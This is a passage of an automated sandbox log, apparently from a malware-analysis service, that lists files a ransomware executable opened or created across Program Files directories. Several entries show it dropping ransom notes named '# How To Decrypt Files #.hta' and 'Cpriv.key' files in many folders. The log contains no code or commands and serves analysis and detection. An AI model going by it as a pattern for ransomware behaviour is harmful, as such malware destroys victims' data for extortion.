Files\Common Files\Microsoft Shared\Stationery\SoftBlue.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0241077.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0387591.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Mozilla Firefox\defaults\pref\channel-prefs.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\logo.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\tt.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0172193.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations_2.4.0.v20131119-0908.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-multiview.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\J0143746.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME06.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Media Player\Media Renderer\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-last-quarter.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Full\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaTypewriterBold.ttf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\js\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Americana\TAB_ON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME35.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\speaker-32.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\in_sidebar\bg_sidebar.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\ca.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.text_3.5.300.v20130515-1451.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Title_Page_Ref.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Templates\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\osppobjs-spp-plugin-manifest-signed.xrm-ms de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToNotesBackground.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\TexturedBlue.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\FAX\OrielFax.Dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_rainy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00916_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiler_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\CONVERT\1033\ORG97R.SAM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PAPER_01.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\OneNote\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\ko-kr.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7\1033\FM20.CHM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\OUTLOOK.DEV_COL.HXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\InformationIconMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGMARQ.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18190_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14793_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00419_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105490.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TR00494_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Oasis.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR41F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGMAIN.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Access\Projects.accdt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099171.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101857.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Common Files\SpeechEngines\Microsoft\TTS20\en-US\enu-dsk\M1033DSK.TTS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\1.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\ipssve.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00641_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00798_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\en-US.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00045_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0300840.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR29F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\eu\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationLeft_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-execution.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGWEBPQT.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color48.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\button_right_mouseout.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\drag.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\JOURNAL\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_right_disable.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui.zh_CN_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\NotifierDownArrow.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\AMERITECH.NET.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-attach_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341499.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\RTF_BOLD.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\fi.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\PAPYRUS\PAPYRUS.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsViewFrame.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\vlc.mo de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util-lookup_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0301076.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\btn-previous-static.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_right.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightOrange\BUTTON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Aspect.thmx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME48.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\CONTACTINFOBB.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Analysis Services\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00413_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-application.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Mozilla Firefox\install.log de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\11.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\SCDRESTS.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue\TAB_ON.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\OneNote\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01242_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18233_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME55.CSS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR1F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_alignleft.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\js\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_divider.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\ipscsy.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-profiler.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\reveal_hov.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\29.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked-loading.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-progress.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\Hiring Requisition.fdt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00145_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00669_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\CONVERT\1033\OLMAILR.FAE de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\ru.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\OneNote.en-us de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\zi\America\Kentucky\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\form_edit.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\lt\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Video-48.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Journal\Templates\Music.jtp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\5.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_zh_CN.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18197_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14530_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\GrayCheck.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\GrayCheck\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PROOF\MSSP7FR.dub de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0400004.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382968.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\XML Files\builtincontrolsschema.xsd de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\lua\http\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\INDUST\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql70.xsl de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-options-keymap.xml_hidden de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\jfr\profile.jfc de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02024_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Flow.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0211949.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_underline.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\feature.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\3.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\MSBuild\Microsoft.Office.InfoPath.targets de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened 